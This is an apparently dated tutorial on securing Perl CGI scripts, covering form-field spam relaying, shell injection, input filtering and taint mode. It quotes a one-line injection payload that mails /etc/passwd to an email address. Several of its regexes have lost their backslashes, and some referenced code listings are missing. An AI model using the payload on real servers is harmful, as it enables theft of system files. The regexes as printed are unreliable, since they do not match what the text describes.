Login

Writing Secure CGI Scripts

One area often overlooked in CGI programming is security. In this article Pete looks at common flaws in CGI scripts and how to fix them with Perl’s taint mode, by filtering user input and more.One area often overlooked in CGI programming is the issue of security. Badly written Perl CGI can not only put your account at risk of being cracked, but it can also expose the whole web server to crackers – not something your system administrator will be too please about. If a web server is cracked due to your negligence, you will almost certainly have your account removed, and may well be liable for costs incurred due to system downtime, reinstallation etc.

Even the big guns in the computing industry seem to have problems writing secure web scripts (several versions of Microsoft’s IIS ship with example ASP scripts which make it possible to view any file on the web server) – sad, since a few basic precautions can greatly reduce the chances of a script being exploited.

In this article we will be looking at some common flaws in CGI scripts, and how they can be avoided. We’ll learn about Perl’s “taint mode”, the dangers of special characters, and how to filter user input.

First up, some common misconceptions on CGI security…{mospagebreak title=Why should I care about security?&toc=1} 1) What harm can a cracker do?

As mentioned earlier, insecure CGI puts you and your web server at risk. Frequently, exploits are found in CGI scripts which will email any file on your system to the cracker – this could be credit card details, password files etc.

If a Unix server is compromised, the only guaranteed fix is to reinstall everything from disk. This obviously results in downtime and a lot of hard work for the administrator – don’t be surprised if they take legal action against you as well.

2) I run a web server on my home computer. Only a few friends know it exists, so it will be safe.

Unfortunately, not true. Often crackers will scan entire ranges of IP addresses looking for vulnerable machines. Security through obscurity is not a solution.

3) Why would anyone want to crack my website? I don’t have any enemies.

Your buggy CGI script which you thought nobody would care about could well turn out to be a stepping stone on the way to exploiting the web sever. A cracker may not care about your website, but he will certainly care about getting his hands on a fast Unix box.

4) I hear so much about security holes in Unix, luckily my hosting company use Windows NT.

Oh dear. The NT + IIS combination has a notoriously bad track record. NT’s only advantage is that it’s second-rate networking and lack of proper multi-user support makes it less attractive to crackers.

5) I only use well-known paid/free CGI scripts. Surely these are safe?

Again, not necessarily. Many famous CGI scripts have bugs in them – some have huge gaping holes. Matt’s FormMail script is one such example, although I must stress that the bug was fixed in subsequent versions. Still, I’ve seen many web providers actually recommending the buggy version in their help pages. We’ll come back to the FormMail script a little later – it’s a classic examples of flawed CGI security in action.

Hopefully by now you realise the importance of secure CGI (if you did not already). In the remaining sections of this article we’ll look at some common holes and how to patch them.

The Golden Rule of CGINever, ever, ever trust user input – this is the key behind writing secure CGI, so chant it like a mantra until it is firmly in your head. Whether accidentally or intentionally, unexpected user input can cause all sorts of havoc in your scripts.

Basic, but you get the general picture: a visitor enters his name and a message. The message then gets emailed onto you. Do you see the problem in the script above? If not, read through it again (it’s flawed thinking, not an actual programming error).

The problem is the hidden input field in the form. At first glance it seems to make sense to set an email address in the form. If your email address changes, or you want to give copies of the script to your friends, it is a lot easier to edit a html field that it is to edit a CGI script.

But that’s forgetting our golden rule: never trust user input. All the cunning cracker has to do is view the source code of your HTML page and copy/paste it into his own HTML page. He can then change the email address in the form to anything he likes. Next, he loads his modified copy of the form in his web browser, fills in an unpleasant message and sends it to someone he doesn’t like. The email gets send via your web server, and the recipient will automatically assume it came from you.

Now this alone might not be too bad, but with the aid of some CGI scripting the process can be automated allowing millions of emails to be sent via your script. A spammer’s dreams come true, and unless you can prove otherwise, you’ll end up getting the blame.

The solution is simple enough: rather than having the hidden form field, add a line to the top of the script such as:

$to = “pete@perlcoders.com”;

..and delete the $to = $q->param(‘to’) line. (Remember to escape the @ by using a backslash).

Simple, and we’ve potentially saved us a lot of trouble. So simple in fact that you may be surprised to learn that a very popular site offering free CGI scripts actually made this mistake. Lots of people who should have known better (including web hosting companies and web designers) still use this script.

It should be noted that the bug was fixed in subsequent versions of the script.

If problems like that don’t bother you, then read on for more CGI horrors.{mospagebreak title=Shell processing&toc=1} The biggest problems come with system commands, in particular when Perl has access to a shell. If you have experience with Unix shells such as bash or tcsh, then you’ll know that they offer a huge variety of commands and characters with special meanings. Unexpected user input can create all sorts of strange effects.

Lets look at an example. Figlet is a popular program for creating fancy ASCII text (you can see my figlet server in action at http://www.p-smith.co.uk/figlet.php3). The basic syntax for using figlet is:

$ figlet ‘Hello World’

Type this at the Unix shell, and it prints Hello World in large letters using the default font. Being a CGI scripter, you will no doubt be thinking “wouldn’t it be cool to create a script to take some letters enter by the user, run them through figlet, and send the result back to the web browser”. And indeed it would be cool.

Not a masterpiece of scripting, but simple enough to illustrate my point. We open a pipe to the figlet binary, passing it the text string to display. We then print the result to the users browser (adding <pre> tags so that it formats correctly).

Now, we are piping data to an external program that involves Perl using the shell, and as we have already mentioned, the shell is a strange beast. No problemo if the user sticks to normal text, but what happens if they enter this?:

“; mail pete@perlcoders.com </etc/passwd

This is the command that ends up getting executed at the shell:

$ /usr/local/bin/figlet “”; mail pete@perloders.com </etc/passwd

This has the effect of running figlet with an empty string (“”), which simply prints out nothing and then pipes the passwd file into an email and sends it to me. Experienced shell users will already know that the semicolon allows us to place two commands on one line.

So what do we do about these kind of problems?

Filtering User InputObviously some sort of filtering is required. You could make a list of all the characters to disallow, but could you really be sure you’d included everything? A better approach is to specify which characters should be allowed, and reject everything else.

Alphanumerics are fine, as are periods, question marks, exclamation marks, underscores and hyphens. Everything else we reject. The regular expression below matches characters that are not any of these (w matches letters, numbers and underscore):

Admittedly this means a trade-off in functionality since the user could not, for example, use apostrophes.

Using a regex like the one above is good practice to use on all user input. Not only does it improve security, but it can also be used to correct the user if they make a mistake – a variable expected to hold the users telephone number should only hold numbers (and maybe spaces), so something like:

if ($phoneno !~ /^[d_]/ ) { ……

… would catch any other characters.

For email addresses, we could even go a step further and specify that the address must be in the form of:

something@something.something

Or as a regex,

.*?@.*?..*?

If you aren’t familiar with regular expressions, then take a look at Mitch’s article on PHP and regular expressions here. Just ignore the PHP and you’ll be able to pick up regular expressions in about 10 minutes.

Perl’s Taint ModeNow, keeping tracking of user input and remembering to check it can be hard work. In a big program it’s too easy to loose track of data that has been checked and data that has not. Luckily Perl comes to the rescue with it’s “taint mode”.

Taint keeps track of user input that has not been checked, and will exit with an error if you attempt to do anything ‘unsafe’ with this data. In effect, taint mode protects you from yourself. Lets look at an example:

The first thing you’ll notice here is the -T flag: this turns taint mode on, in the same way that -w turns warnings on. Hopefully you’ve realised that since $firstname and $surname contain user input, they are considered tainted by perl. Any attempt to use these variables unsafely will cause the script to die.

What you may not have realised is that the variable $fullname is also tainted. Perl keeps track of tainted data for you, and that tainted-ness will follow the variable if it is assigned to another variable.

It’s interesting to note what Perl considers to be an unsafe action. Generally, any attempt to pass tainted data directly to a shell via a pipe is unsafe. If you constructed a filename based on user input, it would be legal to open this file read only, but opening it for writing would cause an error. (This is an interesting point – even thought taint considers it acceptable, you certainly don’t want to allow unchecked data to be used as the basis of a filename).

Now taint mode is rather restrictive, and unless there was a way to ‘untaint’ data, you would have a hard time doing anything usefully in Perl.{mospagebreak title=Untainting data&toc=1} As we’ve already seen, tainted-ness follows a variable – even if it’s value is assigned to another variable. There is, however, one way to untaint data – by matching with a regex.

$something =~ /^([w.]+)$/; $cleanvariable = $1;

Here we specify that $something must contain only letters, numbers, underscore, whitespace, or period. The ^ and $ which force the regex to start and finish with one of these 5 characters.

We’ve also included the [w.] in braces, allowing us to make use of the $1, $2, $3 etc shortcuts. In our example $1 contains the whole value of $something (assuming it *did* only contain letters, numbers, underscores, white space, or periods).

We can shorten this a little further…

($cleanvariable) = $something =~ /^([w.]+)$/;

… since the regex returns the $1, $2, $3 etc variables as a list.

The beauty of taint is that it considers all user input to be unsafe by default, but easily allows us to untaint a variable using a simple regex. Forcing us to perform a pattern match on the variable stops lazy habits from putting our security at risk, and makes us think a little more carefully about just what we expect to find in that data: even though it is not a security risk, it is still good practice to reject a telephone number if it contains letters.

At first you will find taint mode rather frustrating – your script will die for so many extra reasons, but after a while you will find it second nature to think secure, and you scripts will be a lot better for it.